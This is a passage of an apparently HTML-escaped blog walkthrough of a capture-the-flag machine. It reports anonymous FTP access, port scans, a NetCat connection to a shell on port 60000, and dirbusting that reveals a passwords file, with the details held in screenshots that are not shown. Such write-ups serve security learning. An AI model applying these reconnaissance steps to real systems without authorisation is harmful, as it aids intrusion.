medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Exploring FTP server we find that there is Anonymous login allowed:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgqRUdzV3rzTWq7pT9MOWV5cQpwrtpbti9vNtb3f6C622zQ2x_pdHZFBL2ZUpQK2HkDdJ8DnD2T54j64Om4Nqwhz4_6ZWo9mypG4Wh2fIXkHudfX1jZ1hnKmNZ6LkLw209HQpjLB76_QXuM/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;531&quot; data-original-width=&quot;735&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgqRUdzV3rzTWq7pT9MOWV5cQpwrtpbti9vNtb3f6C622zQ2x_pdHZFBL2ZUpQK2HkDdJ8DnD2T54j64Om4Nqwhz4_6ZWo9mypG4Wh2fIXkHudfX1jZ1hnKmNZ6LkLw209HQpjLB76_QXuM/s16000/screenshot.5.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- A 10 points &lt;b&gt;FLAG (10/130)&amp;nbsp;&lt;/b&gt;is available:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3AFhukvTMiTgOkPFeS0WoW914AqpVDuT0fhyP0he3jy6zCn9Qkn1QGlLtTprbihaigVsFFfXIdGXk5BAq4QJrTTr2iLbCQetD6gtkEvosaEpDXXlZznrIY3PvjPDsoVBxDNe5v5DerMwv/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;422&quot; data-original-width=&quot;781&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3AFhukvTMiTgOkPFeS0WoW914AqpVDuT0fhyP0he3jy6zCn9Qkn1QGlLtTprbihaigVsFFfXIdGXk5BAq4QJrTTr2iLbCQetD6gtkEvosaEpDXXlZznrIY3PvjPDsoVBxDNe5v5DerMwv/s16000/screenshot.9.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhl6iVF5CiFWBG-Si3pLWLpZeY_5JkBvbIWUS-tEeWyJCXf_PSG9uQGGDZnn6-JMncVIsCKyjcxn9fnx7ngsStUVbrjfj8iI0tVIUR_TWL6ZyiewL5GuNsqGgs-MMlfsoIMm-mI8Vg-MQ01/&quot; style=&quot;clear: left; display: inline; font-family: arial; font-size: large; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;130&quot; data-original-width=&quot;428&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhl6iVF5CiFWBG-Si3pLWLpZeY_5JkBvbIWUS-tEeWyJCXf_PSG9uQGGDZnn6-JMncVIsCKyjcxn9fnx7ngsStUVbrjfj8iI0tVIUR_TWL6ZyiewL5GuNsqGgs-MMlfsoIMm-mI8Vg-MQ01/s16000/screenshot.10.jpg&quot; /&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: large;&quot;&gt;- Scanning port 22 we don&#39;t find nothing special:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiebvl0TMhL81elQu7N0K-i9nH8xLEyVgKLU8cIe7hO5cRgE-JocRQhXXERWgKR3hT4Im13D-8hvJm2slo9In-947hOuMTclME3AGPKxIWwbP0h6tIjhuXQgxpxssaqABSE5wpUmOR0gVM1/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;427&quot; data-original-width=&quot;863&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiebvl0TMhL81elQu7N0K-i9nH8xLEyVgKLU8cIe7hO5cRgE-JocRQhXXERWgKR3hT4Im13D-8hvJm2slo9In-947hOuMTclME3AGPKxIWwbP0h6tIjhuXQgxpxssaqABSE5wpUmOR0gVM1/s16000/screenshot.6.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Another 10 points &lt;b&gt;FLAG (20/130)&lt;/b&gt; is available just by scanning port 13337:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhfiB3cQtIA8gz824NaWRlzEqhCSa-QgrrAl3g5YoWUN8iQp1QwPlmQ0O-klPR66D-f4w9bCPcVhl0_swqaQhSnxo4fEXUkbxLgaXJ3-lmxxHGVrV7w0qQU9NNWpLeCAPtZ1VzctBNpAzy7/&quot; style=&quot;clear: left; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;370&quot; data-original-width=&quot;773&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhfiB3cQtIA8gz824NaWRlzEqhCSa-QgrrAl3g5YoWUN8iQp1QwPlmQ0O-klPR66D-f4w9bCPcVhl0_swqaQhSnxo4fEXUkbxLgaXJ3-lmxxHGVrV7w0qQU9NNWpLeCAPtZ1VzctBNpAzy7/s16000/screenshot.21.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgwfiOm16iDeMUEvgJbUCO-rQ86OMuZOfXCiHKJ1K4NtqhWqu0mkDxwMiltW_F6ZQkX8RteiTvzPnHXV3CDq9XYWay2fuUdlBgWhUroYXgaS0Gby-Xsig1P9Z1Gd_u5FXW90M7pkxcppIj8/&quot; style=&quot;clear: left; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;133&quot; data-original-width=&quot;428&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgwfiOm16iDeMUEvgJbUCO-rQ86OMuZOfXCiHKJ1K4NtqhWqu0mkDxwMiltW_F6ZQkX8RteiTvzPnHXV3CDq9XYWay2fuUdlBgWhUroYXgaS0Gby-Xsig1P9Z1Gd_u5FXW90M7pkxcppIj8/s16000/screenshot.22.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Scanning port 9090 we find a web server:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEipRxRPxKa-Rha2ykp6QvjsstfBzji8CLMV3vgpR3Qda3kd9mdBnh2gPVNpdTTFZ-xGbay7uSSE8o1odf5T0SuJhbgQ85vnNyVWPEa2PPYM-_I1JnjBsrix-SZUcDfNQ-NXJX1MA98D3dBU/&quot; style=&quot;clear: left; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;277&quot; data-original-width=&quot;750&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEipRxRPxKa-Rha2ykp6QvjsstfBzji8CLMV3vgpR3Qda3kd9mdBnh2gPVNpdTTFZ-xGbay7uSSE8o1odf5T0SuJhbgQ85vnNyVWPEa2PPYM-_I1JnjBsrix-SZUcDfNQ-NXJX1MA98D3dBU/s16000/screenshot.8.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Browsing the server at port 9090 we find a 10 points &lt;b&gt;FLAG (30/130)&lt;/b&gt;:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgu0IXGjc6fweR3xPlrdau3GM0RahMNPsSVi5aM81qP2FR1IjpOo9GdnOo0ZgFYOicuroUzbPiaEx8Y0fUYpQf1G1UV9RAz8yG8xaPCo6eGVjjYMyY3AYR8JnkR9cHMyLJWlFDpK3-pMEj1/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;750&quot; data-original-width=&quot;1157&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgu0IXGjc6fweR3xPlrdau3GM0RahMNPsSVi5aM81qP2FR1IjpOo9GdnOo0ZgFYOicuroUzbPiaEx8Y0fUYpQf1G1UV9RAz8yG8xaPCo6eGVjjYMyY3AYR8JnkR9cHMyLJWlFDpK3-pMEj1/s16000/screenshot.19.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Scanning port 60000 suggest the presence of a reverse shell available:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjYHXMNqG2LIJj-KmHGPhbKVZKEFiK9txxRdRV_EPxJ2WiJoQuaFO9gRjwtPI5wMoX2PleTlrYSaJgFDOc7jjLt4XUes3mWNSXKq89ShR0UsxQ2KVlwlZQVUYk7obeMGVQ5EwceBnsPaKJX/&quot; style=&quot;clear: left; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;368&quot; data-original-width=&quot;818&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjYHXMNqG2LIJj-KmHGPhbKVZKEFiK9txxRdRV_EPxJ2WiJoQuaFO9gRjwtPI5wMoX2PleTlrYSaJgFDOc7jjLt4XUes3mWNSXKq89ShR0UsxQ2KVlwlZQVUYk7obeMGVQ5EwceBnsPaKJX/s16000/screenshot.23.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Connecting to the port 60000 with NetCat we discover a 10 points &lt;b&gt;FLAG (40/130)&lt;/b&gt;:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9poZi3MwUUIvnqjWzlY-xakeOjU4DdON3c-rDnP49LdIxDuMh_rn4EFDlEK3S_Pel7hgHsPwiKBJlL6HUyV67vTyJdCo_imMBcAZb2MZvJ2ZoQELpfubGjGdVQnkfSf_fw-828FV8Gfdp/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;139&quot; data-original-width=&quot;523&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9poZi3MwUUIvnqjWzlY-xakeOjU4DdON3c-rDnP49LdIxDuMh_rn4EFDlEK3S_Pel7hgHsPwiKBJlL6HUyV67vTyJdCo_imMBcAZb2MZvJ2ZoQELpfubGjGdVQnkfSf_fw-828FV8Gfdp/s16000/screenshot.91.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Scanning port 80:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhX0QkM_WWWSR5EW8zME02Jc3DhSJZ9F0oqBNFYwYCbuWaP7TKKpmgcr3js61qU6QwWbmeqJzKa4FuXKfCYOysybFITOcPX1Mtz_jFa7DEvv5cmPkiSRzh2oRBNbX-faUQIV7lvmOXeqY0p/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;253&quot; data-original-width=&quot;698&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhX0QkM_WWWSR5EW8zME02Jc3DhSJZ9F0oqBNFYwYCbuWaP7TKKpmgcr3js61qU6QwWbmeqJzKa4FuXKfCYOysybFITOcPX1Mtz_jFa7DEvv5cmPkiSRzh2oRBNbX-faUQIV7lvmOXeqY0p/s16000/screenshot.7.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Dirbusting port 80 we find &lt;b&gt;robots.txt&lt;/b&gt; and&lt;b&gt; passwords&lt;/b&gt;:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjvpvV8OiqFqlsDS00Y1iDOfbMWm9r_ZpYS07lSrOHtCRXpl1gNPF80Et2FzQEMFY_2Gxyyt_DNV37Nj1nrfnPWldKM8z8twruZF6NvGssysRsFqcwj8ehfLWB_DzUP8FWI-JYYJNtCRSwk/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;646&quot; data-original-width=&quot;673&quot; 